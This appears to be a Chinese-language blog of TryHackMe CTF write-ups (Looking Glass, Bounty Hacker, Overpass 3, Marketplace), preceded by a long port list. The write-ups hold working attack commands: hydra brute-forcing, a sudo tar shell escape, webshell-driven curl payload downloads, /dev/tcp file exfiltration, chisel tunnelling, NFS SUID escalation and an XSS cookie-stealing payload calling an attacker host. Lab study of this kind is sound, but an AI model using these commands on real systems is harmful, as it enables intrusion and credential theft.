,10983,10985,9991,9995,10984,9993,9992,9994,9989,9990,9987,9988,10986,10988,10987,10990,10991,10989,10994,10993,10992,10997,10996,10998,10995,10999,11001,11000,11005,11002,11006,11004,11010,11009,11003,11008,11011,11007,11012,11013,11016,11017,11014,11015,11019,11020,11018,11021,11022,11023,11024,11031,11025,11030,11027,11028,11026,11029,11033,11035,11034,11032,11036,11037,11038,11040,11042,11039,11041,11043,11044,11046,11045,11047,11048,11049,11050,11051,11053,11054,11052,11055,11057,11056,11059,11058,11060,11062,11063,11061,11065,11066,11069,11064,11067,11068,11070,11071,11073,11074,11075,11072,11079,11076,11077,11078,10169,10177,10163,10164,10166,10170,11080,10171,10176,10175,10165,10167,11081,10168,11083,11082,11084,11085,11086,11087,11088,11089,11090,11091,11095,11093,11094,11092,11097,11100,11096,11101,11102,11098,11099,11105,11103,11104,11106,11114,11109,11110,11108,11113,11111,11116,11107,11115,11117,11122,11112,11118,11120,11121,11119,11123,11124,11125,11127,11126,11128,11129,11130,11131,11134,11133,11132,11137,11136,11135,11138,11139,11140,11142,11141,11143,11144,11148,11146,11149,11145,11147,11150,11154,11153,11151,11152,11155,11158,11159,11163,11157,11162,11156,11160,11161,11164,11172,11167,11171,11168,11174,11170,11166,11169,11179,11165,11175,11173,11177,11178,11176,11182,11181,11183,11180,11184,11185,11187,11186,11188,11189,11190,10236,10237,10233,10232,11192,10235,11196,10234,11199,11191,11193,11195,11217,11198,11215,11194,11197,11200,11216,11201,11229,11226,11225,11228,11227,11234,11240,11235,11230,11236,11241,11244,11243,11239,11242,11245,11246,11248,11256,11255,11249,11247,11257,11260,11258,11261,11272,11273,11259,11275,11274,11286,11288,11289,11287,11290,11292,11291,11309,11298,11295,10386,11297,11293,10385,11308,11294,11296,11310,11307,10387,11314,11316,11312,11313,11311,11320,11318,11315,11319,11317,11322,11321,11324,11332,11323,11333,11337,11335,11334,11340,11336,11339,11338,11341,10418,10431,10419,10428,10420,10412,10417,10409,10433,10432,10422,10407,10414,10404,10421,10410,10430,10423,10435,10411,10415,10434,10408,10426,10427,10424,10403,10429,10413,10425,10416,10398,10396,10389,10405,10399,10388,10402,10406,10397,10400,11342,10395,10393,10401,10391,10392,10394,10390,11351,11347,11343,11346,11350,11352,11348,11356,11355,11354,11349,11353,10483,10482,10473,10481,10451,10474,10468,10472,10443,10471,10470,10458,10469,10467,11357,11359,10457,11358,11360,11362,11361,11366,11368,11365,11363,11364,11367,11370,11371,11372,11369,11376,11375,11374,11377,11373,11378,11380,11381,11379,11382,11383,11384,11390,11398,11387,11385,11392,11389,11391,11395,11393,11388,11397,11386,11394,11396,11399,11409,11404,11400,11401,11402,11407,11405,11413,11412,11411,11403,11406,11410,11416,11414,11408,11415,11417,11420,11419,11418,11421,11422,11423,11424,11425,11426,11427,11430,11428,11432,11429,11433,11431,11436,11435,11434,11437,11438,11441,11442,11440,11439,11445,11443,11452,11444,11448,11453,11449,11454,11446,11447,11450,11455,11451,11457,11456,11458,11459,11460,11461,11462,11464,11463,11465,11466,11470,11469,11467,11468,11471,11472,11473,11474,11475,11476,11477,11478,11479,11480,11481,11482,11483,11484,11486,11485,11487,11488,11489,11490,11493,11491,11494,11492,11496,11497,11495,11500,11501,11502,11498,11499,11503,11504,11505,11506,11507,11509,11510,11512,11508,11514,11511,11513,11515,11517,11516,11519,11518,11520,11521,11524,11523,11522,11527,11525,11526,11529,11528,11530,11531,11532,11535,11533,11534,11536,11538,11537,11539,11540,11541,11542,11543,11546,11545,11544,11550,11549,11548,11547,11552,11551,11553,11556,11554,11557,11555,11558,11559,11564,11562,11560,11563,11561,11565,11566,11567,11568,11569,11570,11572,11576,11575,11608,11609,11610,11611,11795,11612,11796,11800,11798,11803,11799,11802,11797,11801,11812,11804,11808,11811,11807,11809,11820,11815,11817,11810,11805,11824,11816,11806,11823,11821,11814,11819,11813,11827,11826,11818,11822,11825,11829,11828,11831,11833,11830,11832,10847,10846,10845,10848,11834,11839,11836,11835,11840,11838,11837,11841,11843,11842,11844,10877,10872,10873,10871,10876,10875,10869,10868,10867,10874,10870,11845,10859,11846,10854,10853,10851,10850,10849,11848,11849,10852,11852,11847,11850,11855,11851,11853,11854,11856,11860,11859,11858,11863,11857,11864,11861,11865,11862,11866,11867,11868,10917,10916,10900,10915,10910,10914,10908,10906,10909,10907,10899,10913,10911,10912,10898,10897,11870,11869,11871,11872,11873,11876,11875,11878,11877,11874,11879,11881,11880,11883,11882,11884,11886,11885,11888,11887,11890,11889,11891,11892,11893,11895,11894,11896,11897,11900,11898,11899,11901,11902,11904,11903,11905,11906,11908,11910,11909,11911,11907,11912,11913,11914,11916,11915,11917,11918,11919,11920,11921,11924,11922,11923,11927,11925,11926,11929,11928,11931,11932,11930,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11945,11946,11943,11944,11947,11948,11949,11950,11951,11953,11952,11956,11954,11957,11958,11955,11961,11960,11959,11962,11963,11964,11965,11966,11968,11967,11971,11969,11970,11972,11974,11973,11975,11977,11976,11978,11979,11980,11982,11981,11983,11985,11984,11986,11987,11990,11989,11988,11992,11991,11995,11993,11996,11994,11997,11999,11998,12000,12001,12002,12003,12004,12007,12006,12005,12008,12009,12015,12016,12017,12013,12014,12011,12020,12012,12019,12010,12018,12021,12023,12024,12022,12025,12026,12027,12028,12030,12029,12034,12031,12032,12033,12035,12036,12038,12039,12042,12037,12041,12040,12043,12045,12047,12044,12048,12049,12050,12046,12051,12052,12053,12054,12055,12056,12058,12057,12059,12060,12064,12061,12063,12065,12066,12062,12067,12068,12069,12071,12070,11214,11211,12072,11207,11212,11213,11209,11210,11206,11208,11202,11203,11204,11205,12073,12074,12077,12075,12076,12078,12079,12083,12082,12081,12080,12084,12085,12087,12086,12090,12089,12088,12091,12092,12094,12093,12095,12096,12098,12097,12101,12099,12102,12100,12107,12104,12106,12103,12105,12108,12109,12110,11224,11222,11221,11223,11220,11238,11219,11218,11232,11237,11231,11233,12111,12113,12112,12118,12114,12117,12121,12120,12116,12119,12115,11265,11266,11282,11276,11270,11278,11267,11284,11285,11269,11283,12122,11279,11262,11268,11277,11280,11263,11250,11271,11281,11253,11254,11264,11251,11252,12123,12124,12125,12126,12127,12130,12131,12128,12132,12134,12129,11331,11328,11326,11330,11325,11306,11329,12133,11304,11327,11300,11301,12140,11305,12139,11303,11299,12135,11302,12137,12138,12136,12141,12142,12144,12143,12145,12147,12148,12149,12150,12151,12146,12153,12152,11345,12154,12155,12156,11344,12158,12157,12163,12165,12159,12161,12160,12166,12162,12164,12167,12168,12171,12169,12170,12172,12173,12176,12178,12177,12174,12175,12179,12180,12182,12181,12183,12185,12184,12187,12188,12186,12191,12192,12189,12193,12190,12194,12195,12196,12197,12198,12199,12200,12201,12203,12202,12204,12205,12206,12207,12208,12209,12210,12212,12211,12214,12217,12213,12215,12216,12218,12219,12220,12221,12222,12224,12225,12226,12223,12227,12228,12230,12229,12231,12234,12235,12232,12233,12238,12236,12237,12240,12239,12244,12242,12243,12241,12249,12246,12245,12248,12250,12251,12254,12247,12252,12255,12253,12259,12258,12256,12257,12261,12260,12262,12264,12263,12265,12268,12267,12269,12266,12270,12272,12271,12273,12274,12278,12277,12276,12281,12275,12279,12282,12280,12283,12284,12286,12285,12288,12287,12289,12290,12291,12292,12294,12296,12295,12293,12298,12297,12299,12302,12300,12303,12301,12304,12305,12306,12310,12311,12316,12309,12307,12313,12314,12308,12312,12317,12321,12318,12322,12326,12320,12325,12319,12324,12323,12327,12328,12329,12330,12332,12331,12315,12334,12335,12333,12336,12337,12339,12338,12340,12343,12341,12344,12342,12345,12346,12348,12347,12352,12350,12349,12351,12353,12354,12361,12358,12356,12355,12366,12359,12364,12367,12365,12360,12362,12363,12357,12368,12369,12370,11587,11595,11596,11593,11579,11582,11584,11588,11598,11590,11585,11592,11583,11594,11591,11586,11597,11580,11589,11574,11573,11578,11577,11571,11581,12372,12371,12373,12376,12380,12382,12379,12378,12374,12377,12375,12381,12384,12383,12392,12387,12391,12385,12390,12389,12386,12388,12393,12394,12398,12396,12397,12399,12401,12400,12395,12404,12402,12403,12405,12406,12409,12407,12411,12408,12413,12410,12414,12415,12416,11644,12412,11648,11646,11647,11645,11649,11643,11636,11639,11642,11635,11640,11632,12417,11626,11634,11623,11630,11625,11615,11628,11622,11641,11638,11627,11631,11613,11619,11624,11620,11629,11637,11633,11616,11614,11607,11617,11621,11618,11603,11602,11601,11606,11605,11600,11604,11599,12418,12420,12419,12421,12422,12424,12423,12425,12447,12439,12441,12436,12437,12445,12451,12450,12442,12446,12449,12440,12426,12452,12438,12448,12455,12443,12444,12453,12454,12456,12458,12459,12457,12463,12462,12474,12475,12473,12476,11793,11792,11794,11788,11785,11786,11791,11782,11784,11776,11790,11780,11789,11783,11787,11778,11772,11770,11781,11777,11779,11768,11774,11769,11767,11771,11775,11761,11773,11765,11764,11762,11755,11758,11751,11754,11759,11745,11753,11747,11766,11757,11760,11763,11756,11744,11735,11746,11750,11738,11743,11740,11741,11748,11749,11752,11732,11737,11742,11730,11727,11731,11736,11734,11729,11739,11733,11728,12485,12483,12478,12477,12484,12486,12487,12491,12493,12492,12495,12494,12496,12497,12498,12500,12502,12501,12499,12503,12504,12505,12506,12508,12507,12509,12512,12510,12514,12511,12513,12515,12516,12517,12518,12524,12520,12523,12522,12519,12521,12526,12525,12527,12529,12528,12530,12531,12532,12534,12536,12533,12535,12543,12538,12537,12539,12544,12540,12541,12542,12547,12546,12554,12545,12548,12549,12553,12555,12551,12556,12552,12550,12557,12559,12558,12560,12562,12561,12563,12564,12566,12567,12568,12565,12569,12570,12573,12572,12571,12574,12579,12576,12577,12575,12580,12578,12584,12581,12583,12586,12587,12582,12585,12588,12590,12589,12592,12595,12593,12591,12594,12596,12599,12600,12597,12601,12598,12604,12602,12605,12606,12603,12607,12608,12610,12609,12611,12612,12615,12613,12614,12628,12631,12632,12626,12627,12629,12630,12633,12634,12635,12636,12646,12647,12648,12649,12650,12653,12651,12656,12655,12654,12652,12658,12662,12660,12659,12657,12661,12665,12663,12664,12666,12669,12667,12668,12670,12671,12672,12673,12674,12675,12676,12679,12677,12685,12678,12686,12688,12687,12697,12698,12699,12701,12700,12713,12703,12712,12714,12711,12702,12720,12716,12717,12721,12718,12719,12715,12722,12725,12723,12724,12726,12728,12730,12727,12735,12731,12729,12734,12737,12732,12733,12736,12739,12745,12738,12740,12748,12746,12761,12749,12762,12750,12747,12770,12765,12772,12768,12766,12767,12769,12763,12778,12775,12780,12782,12777,12776,12771,12764,12781,12784,12783,12779,12787,12786,12788,12790,12789,12791,12794,12797,12798,12800,12799,12796,12802,12795,12793,12792,12803,12801,12804,12808,12806,12815,12816,12807,12805,12819,12817,12818,12820,12823,12824,12826,12822,12825,12821,12827,12828,12829,12832,12831,12830,12834,12835,12833,12836,12837,12838,12839,12841,12842,12840,12843,12846,12844,12850,12848,12849,12845,12851,12847,12854,12852,12855,12853,12856,12858,12857,12860,12861,12859,12862,12863,12864,12865,12867,12868,12866,12869,12872,12875,12873,12870,12874,12876,12878,12871,12879,12882,12880,12883,12881,12877,12887,12885,12886,12884,12889,12890,12896,12893,12892,12891,12888,12895,12894,12897,12898,12900,12901,12899,12904,12903,12902,12907,12905,12906,12908,12910,12909,12911,12913,12912,12915,12916,12914,12917,12918,12919,12921,12922,12920,12924,12925,12923,12926,12927,12928,12929,12932,12930,12933,12931,12934,12942,12936,12935,12939,12937,12943,12944,12940,12941,12945,12938,12946,12947,12949,12951,12950,12948,12952,12953,12954,12958,12956,12962,12955,12959,12960,12961,12957,12970,12972,12966,12965,12969,12968,12967,12964,12973,12974,12976,12978,12971,12985,12977,12979,12963,12981,12987,12986,12984,12982,12993,12990,12988,12975,12992,12980,12989,12983,12991,12999,12995,12996,13000,13002,13001,12994,12997,12998,13003,13004,13007,13015,13012,13011,13008,13017,13016,13005,13014,13009,13010,13018,13006,13013,13031,13033,13030,13149,13029,13035,13034,13032,13037,13036,13152,13150,13151,13235,13153,13236,13237,13240,13241,13238,13242,13245,13239,13247,13243,13244,13246,13248,13249,13255,13258,13257,13260,13259,13262,13256,13270,13264,13263,13269,13271,13272,13275,13276,13277,13278,13279,13280,13282,13284,13286,13283,13285,13281,13287,13288,13290,13294,13293,13289,13291,13292,13296,13297,13295,13299,13305,13302,13300,13298,13301,13306,13303,13304,12435,12430,12428,12433,12432,12431,12434,12427,12429,13308,13307,13309,13311,13312,13310,13314,13317,13315,13316,13313,13318,13319,13323,13321,13320,13324,13325,13326,13322,13327,13328,13329,13330,13331,13333,13332,13334,12470,12472,12469,12466,12467,12471,12468,12464,12465,12461,12460,13336,13335,13339,13337,13338,13342,13341,13344,13343,13340,13345,13346,13347,13348,13349,13350,12490,12489,12488,12482,12481,12479,12480,13351,13353,13352,13354,13356,13355,13357,13358,13359,13367,13364,13361,13360,13363,13362,13365,13366,13369,13373,13370,13371,13368,13379,13372,13378,13374,13376,13375,13381,13382,13380,13377,13383,13384,13385,13390,13386,13388,13387,13389,13391,13392,13399,13393,13395,13400,13397,13404,13396,13398,13402,13403,13415,13408,13407,13412,13401,13394,13405,13406,13416,13409,13417,13414,13410,13411,13419,13418,13413,13420,13424,13421,13425,13423,13422,13426,13427,13428,13430,13429,13431,13432,13434,13433,13437,13436,13440,13439,13435,13438,13444,13443,13449,13448,13447,13442,13446,13454,13441,13451,13450,13457,13456,13445,13455,13465,13452,13453,13458,13462,13459,13461,13469,13467,13466,13470,13472,13460,13468,13464,13463,13471,13474,13476,13473,13479,13475,13477,13478,13481,13480,13482,12624,13496,12620,12616,12623,12622,13497,12625,12617,12621,12619,12618,13500,13499,13502,13501,13498,13503,13507,13505,13504,13509,13506,13511,13508,13512,13514,13510,13515,13513,12642,12645,12640,12637,12644,12643,12639,12638,12641,13517,13521,13519,13522,13516,13518,13520,13523,13524,13525,13526,13528,13530,13531,13527,13529,13532,13533,13534,13535,13536,13537,13539,13538,13541,13543,13540,13542,13544,13545,13546,13547,13548,13549,13550,13551,13552,13554,13553,12710,12707,12709,12708,13555,12705,13556,12706,12694,12704,12683,12693,12690,12680,12695,12684,12692,12681,12689,12696,12682,13557,12691,13561,13560,13562,13559,13558,13570,13568,13565,13571,13564,13567,13563,13566,13575,13574,13573,13569,13572,13576,13578,13577,13579,12741,12759,12751,12785,12752,13580,12743,12744,12756,12754,12774,12755,12760,12753,12757,12758,12773,12742,13581,13582,13583,13584,13585,13586,13587,13589,13588,12812,12814,12813,12811,12810,12809,13590,13593,13592,13591,13594,13598,13595,13596,13597,13599,13601,13600,13602,13603,13605,13606,13604,13608,13607,13609,13610,13611,13612,13614,13615,13613,13616,13617,13619,13618,13620,13621,13625,13622,13624,13623,13627,13626,13628,13629,13630,13634,13635,13632,13633,13636,13631,13637,13638,13641,13640,13642,13639,13646,13645,13647,13643,13644,13649,13648,13652,13650,13655,13654,13651,13653,13656,13657,13658,13660,13659,13661,13663,13662,13664,13665,13667,13666,13668,13671,13670,13672,13669,13675,13674,13677,13673,13676,13681,13686,13679,13685,13680,13682,13687,13678,13683,13684,13688,13691,13693,13695,13689,13694,13690,13692,13697,13696,13698,13699,13701,13700,13702,13703,13704,13708,13706,13707,13709,13710,13705,13713,13711,13712,13722,13716,13714,13717,13725,13723,13720,13715,13727,13721,13724,13718,13726,13729,13728,13731,13719,13730,13732,13733,13734,13745,13738,13735,13740,13743,13741,13746,13744,13737,13739,13742,13736,13747,13748,13750,13754,13048,13752,13753,13749,13756,13043,13755,13751,13044,13047,13027,13757,13021,13019,13045,13038,13046,13028,13042,13026,13020,13039,13025,13041,13024,13022,13040,13023,13758,13759,13762,13760,13761,13766,13765,13763,13764,13767,13768,13772,13061,13059,13062,13060,13773,13774,13779,13780,13791,13792,13794,13793,13795,13800,13796,13799,13797,13801,13798,13802,13074,13808,13840,13809,13807,13075,13806,13823,13824,13839,13841,13842,13104,13106,13103,13105,13101,13102,13100,13099,13088,13098,13089,13090,13087,13844,13854,13853,13856,13851,13096,13094,13097,13095,13852,13850,13855,13857,13858,13863,13849,13865,13864,13866,13867,13868,13872,13871,13869,13870,13873,13874,13127,13134,13129,13132,13131,13118,13117,13122,13115,13135,13116,13133,13128,13111,13124,13123,13107,13121,13126,13130,13109,13119,13113,13120,13112,13114,13108,13110,13125,13144,13148,13146,13138,13142,13143,13145,13147,13137,13139,13136,13140,13141,13163,13875,13164,13162,13174,13878,13165,13170,13158,13167,13169,13173,13172,13175,13154,13166,13155,13161,13160,13157,13171,13168,13156,13159,13880,13879,13882,13883,13881,13885,13884,13887,13886,13892,13888,13890,13889,13891,13227,13232,13893,13234,13894,13233,13220,13228,13221,13224,13230,13231,13213,13212,13229,13223,13222,13214,13199,13204,13218,13215,13216,13225,13207,13217,13226,13208,13219,13205,13210,13206,13209,13193,13201,13200,13202,13198,13195,13211,13203,13185,13194,13189,13187,13184,13188,13197,13191,13192,13186,13196,13183,13190,13895,13179,13178,13181,13898,13896,13177,13180,13176,13182,13897,13899,13900,13906,13902,13901,13905,13904,13253,13251,13254,13907,13903,13252,13250,13908,13909,13910,13912,13911,13913,13914,13261,13915,13267,13274,13265,13916,13268,13273,13266,13917,13918,13919,13920,13921,13924,13925,13926,13923,13922,13928,13930,13927,13931,13932,13933,13929,13934,13935,13936,13938,13939,13941,13937,13942,13943,13940,13944,13945,13946,13947,13948,13951,13949,13950,13952,13953,13954,13955,13956,13957,13958,13959,13962,13960,13961,13963,13966,13968,13964,13965,13967,13972,13969,13971,13973,13979,13970,13977,13975,13981,13974,13978,13982,13980,13983,13984,13987,13986,13988,13976,13985,13989,13990,13993,13991,13992,13994,13997,13998,13995,13996,13999,13487,13489,13490,13486,13484,13488,13491,13485,13483,13494,13495,13492,13493,13778,13775,13770,13769,13777,13787,13789,13771,13783,13788,13784,13776,13790,13781,13782,13786,13785,13834,13833,13837,13825,13838,13835,13822,13836,13832,13820,13817,13829,13827,13828,13814,13803,13830,13831,13821,13826,13815,13819,13805,13818,13811,13804,13816,13813,13810,13812,13862,13861,13848,13860,13859,13847,13845,13843,13846,13877,13876 10.10.150.136
發現 nmap 結果都一樣- 9100 ~ 9107 好像不太一樣
但實際連上去看起來還是一樣的直接用 ssh 連線-
他跟我說了一個 Lower
輸入比較大的數字又跟我說 Higher我們可以計算一下 port 的最小跟最大值-
13999 - 9000 = 4999如果透過二分搜尋法的話， Worst case 是- log2(13999 - 9000) = 1504發現他的 High Low 是反的

import subprocess
ip = "10.10.150.136"

ports = open("ports.txt").read().split("\n")
ports = [int(i) for i in ports]
ports.sort()

# port = ports[-1]
l = ports[0]
r = ports[-1]
while True:
 port = int((l+r)/2)
 print(f"L={l} , R={r}")
 process = subprocess.Popen(['ssh', '-o' , 'StrictHostKeyChecking=no' , str(ip) , '-p' , str(port)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
 out, err = process.communicate()
 print(port , out)
 if out == b'Lower\r\n':
 # r = port
 l = port
 elif out == b'Higher\r\n':
 # l = port
 r = port
 else:
 print("!!!!!")
 break

爆出結果是 9934上面出現一堆的亂碼-

You've found the real service.
Solve the challenge to get access to the box
Jabberwocky
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.

'Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!'

Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.

Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!

Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.

'Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!'
Wl ciskvttk me apw jzn.

'Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd

看起來是 jabberwocky 的詩，透過某種方法進行編碼/加密https://www.poetryfoundation.org/poems/42916/jabberwocky分析密文-
推測可能是 Chaocipher 或 Vigenere Cipher透過網站爆破- https://www.boxentriq.com/code-breaking/vigenere-cipher
炸出了結果twas brillig and the slithy toves did gyre and gimble in the wabe all mimsy were the borogoves and the mome raths outgrabe beware the jabberwock my son the jaws that bite the claws that catch beware the jubjub bird and shun the frumious bandersnatch he took his vorpal sword in hand long time the manxome foe he sought so rested he by the tumtum tree and stood awhile in thought and as in uffish thought he stood the jabberwock with eyes of flame came whiffling through the tulgey wood and burbled a
key 為 thealphabetcipher透過廚師正式解碼-

'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.

'Beware the Jabberwock, my son!
The jaws that bite, the claws that catch!
Beware the Jubjub bird, and shun
The frumious Bandersnatch!'

He took his vorpal sword in hand:
Long time the manxome foe he sought--
So rested he by the Tumtum tree,
And stood awhile in thought.

And as in uffish thought he stood,
The Jabberwock, with eyes of flame,
Came whiffling through the tulgey wood,
And burbled as it came!

One, two! One, two! And through and through
The vorpal blade went snicker-snack!
He left it dead, and with its head
He went galumphing back.

'And hast thou slain the Jabberwock?
Come to my arms, my beamish boy!
O frabjous day! Callooh! Callay!'
He chortled in his joy.

'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.
Your secret is bewareTheJabberwock

看到了 secret 為 bewareTheJabberwock輸入後
取得了一組帳號密碼jabberwock:ThankedDrownedSpeakWishing

SSH

可以正常連上取得 User Flag-
}32a911966cab2d643f5d57d9e0173d56{mht
看起來是字串反轉
thm{65d3710e9d75d5f346d2bac669119a23}

提權

起手式 sudo -l準備豌豆-
sudo 版本怪怪ㄉ- 檔案系統可能怪怪ㄉ發現重新開機會用 jabberwock 使用者執行腳本- 而這個腳本我們可寫- 寫一個 reverse shell 然後重開機
重新開機後順利收到 shell-

二次提權

python3 -c 'import pty; pty.spawn("/bin/bash")'觀察家目錄的檔案-

dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b

看起來是一堆的 hash

Bounty Hacker (Try Hack Me Writeup)

Thu, 19 Aug 2021 23:57:00 +0800

URL : https://tryhackme.com/room/cowboyhacker

IP : 10.10.164.54

Recon

掃 Portrustscan -a 10.10.164.54 -r 1-65535
21
22
80nmap -A -p21,22,80 10.10.164.54-
FTP 可以匿名登入 !!觀察首頁-
沒啥東東dirsearch- 也沒啥東東

FTP 登入
裡面有兩ㄍ檔案都載下來FTP 檔案- 作者是 lin- 看起來是一個密碼表

爆破密碼

hydra -l 'lin' -P locks.txt ssh://10.10.164.54
帳號 : lin
密碼 : RedDr4gonSynd1cat3SSH 登入成功- 取得 user flag-

提權

起手式 sudo -l
發現可以用 sudo tarGTFOBins 尋找 tar sudo 提權- https://gtfobins.github.io/gtfobins/tar/#sudo
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh提權完畢，取得 root flag-

Overpass 3 (Try Hack Me Writeup)

Wed, 18 Aug 2021 13:10:00 +0800

URL : https://tryhackme.com/room/overpass3hosting

IP : 10.10.208.60

Recon

先掃 Portrustscan -a 10.10.208.60
嘗試 FTP Anonymous 登入-
發現不行觀察首頁- 掃目錄- python3 dirsearch.py -u http://10.10.208.60/
/backups/
找到一包 Backup

GPG 解密

觀察 Backupwget http://10.10.208.60/backups/backup.zip
裡面有兩個檔案
gpg 加密後的檔案跟它的 keygpg --import priv.key
gpg --output ./a.xlsx --decrypt ./CustomerDetails.xlsx.gpg解開後是一個 Excel 表格-
paradox:ShibesAreGreat123
0day:OllieIsTheBestDog
muirlandoracle:A11D0gsAreAw3s0me

爆破密碼

有一連串的帳號跟密碼，試著用 Hydra 爆破 SSHhydra -L user.txt -P pass.txt ssh://10.10.208.60
發現 SSH 不能用密碼登入試著爆破 FTP- hydra -L user.txt -P pass.txt ftp://10.10.208.60
找到了一組帳密可以使用paradox:ShibesAreGreat123

FTP 2 Webshell

嘗試登入 FTP
發現看起來是 webroot
放隻 Webshell 上去
put webshell.php
發現成功惹!!使用 Webshell-
放 Reverse shellhttp://10.10.208.60/webshell.php?A=curl%20-o%20%20/tmp/s%2010.13.21.55:8000/s
本地開 nc -nlvp 7877
http://10.10.208.60/webshell.php?A=bash%20/tmp/s
收到 Reverse shell

提權

轉互動式 shellpython3 -c 'import pty; pty.spawn("/bin/bash")'找 Web Flag- find / -iname '*flag*' -print 2>/dev/null
找到在 /usr/share/httpd/web.flagthm{0ae72f7870c3687129f7a824194be09d}準備 Linpeas- curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh
bash linpeas.shSudo version 1.8.29發現 nfs 很可疑，但我們先繼續看下去-
https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe發現幾個檔案可以 setuid-
但都不能利用發現 nfs 如果需要利用，需要用 showmount，但電腦裡沒有- 自己載一包來放著
curl -o ./showmount http://10.13.21.55:8000/showmount
但 run 起來都失敗 QQ發現根目錄有奇怪的檔案- /.autorelabel
用 nc 傳出來觀察
cat .autorelabel > /dev/tcp/10.13.21.55/1234
發現裡面是空的 QQ突然想到可能可以切換使用者- 因為前面我們 Excel 有密碼
su paradox
切換使用者成功

二次提權

基本上我們猜測接下來就要使用 nfs 的漏洞，但是我們一開始 nfs 在掃 port 時並沒有掃到，因此猜測它只開在 local，我們來掃掃看 local 的 port準備 nmap binaryhttps://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap掃下去-
找到 nfs 開在 2049 port觀察發現 paradox 的 .ssh 只有 public key-
好ㄉ沒啥用 = =本地端有開 nfs 但我們權限很低，那我們可以把 nfs 給用 port forwarding 打出來，使用 chisel- https://github.com/jpillora/chisel
curl http://10.13.21.55:8000/chisel -o chisel
chmod +x chisel輸入指令- 攻擊機 : ./chisel server --reverse -p 7414靶機 : ./chisel client 10.13.21.55:7414 R:2049:127.0.0.1:2049- 用 nmap 掃攻擊機看看有沒有真的打通- 把 nfs mount 到本機- sudo mount -t nfs localhost:/ mount/
發現 mount 成功-
裡面有 ssh 的 key，所以我們可以複製出來直接用 james 的 ssh 進行登入
也找到了 User 的 Flag在攻擊機 mount 的 nfs 目錄- 直接複製自己的 /bin/bash
給它 +s 提供 suid再用 james 進行執行-
發現怎麼還是 james QQ再回來攻擊機 chown 把 bash 的 owner 改 root- 就可以ㄌ!!Root flag- thm{a4f6adb70371a4bceb32988417456c44}

學到ㄌ

Port forwarding
NFS 提權
SUID 要 own=root才能用

The Marketplace (Try Hack Me Writeup)

Tue, 17 Aug 2021 13:27:00 +0800

URL : https://tryhackme.com/room/marketplace

IP : 10.10.74.8

Recon

首先先掃 Portrustscan -a 10.10.74.8 -r 1-65535
有開 22 80 32768nmap -A -p22,80,32768 10.10.74.8- 觀察首頁-
感覺滿廉價ㄉQQ掃目錄- python3 dirsearch.py -u http://10.10.74.8/``robots.txt
login
signup
嘗試註冊-
meow / meow嘗試貼文-
發現下面說不能PO檔案，感覺有埋梗用 F12 把 disable 拔掉再測- 觀察 robots.txt- 觀察 Session-
看起來很 Base64eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibWVvdyIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjI5MDk5NDQwfQ.6MNSd_Wf1ytqceTjhWWGEbB4AhzTHFshHCLIeVF_Zeo
解碼後看起來是 JWT{"alg":"HS256","typ":"JWT"}{"userId":4,"username":"meow","admin":false,"iat":1629099440}5'YrN8VXa!1Ų,^

XSS

發現 Po 文處可以 XSS寫 Payload 偷餅乾- new Image().src="http://10.13.21.55:1234/"+document.cookie
回報給管理員- 用 nc -l 1234 來接-
收到管理員的餅乾GET /token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjkxMDAxOTN9.f-eVVqF1AnFJEeuam97hn-Xz3fFNbQAJYTKrsDukzrU HTTP/1.1使用管理員帳號登入- 把自己的餅乾換成管理員的首頁- 取得 Flag1- THM{c37a63895910e478f28669b048c348d5}

SQLi

發現看使用者這邊可以用 SQL injection點進去之後，透過 F12 複製成 curl 再轉 python 的 request-
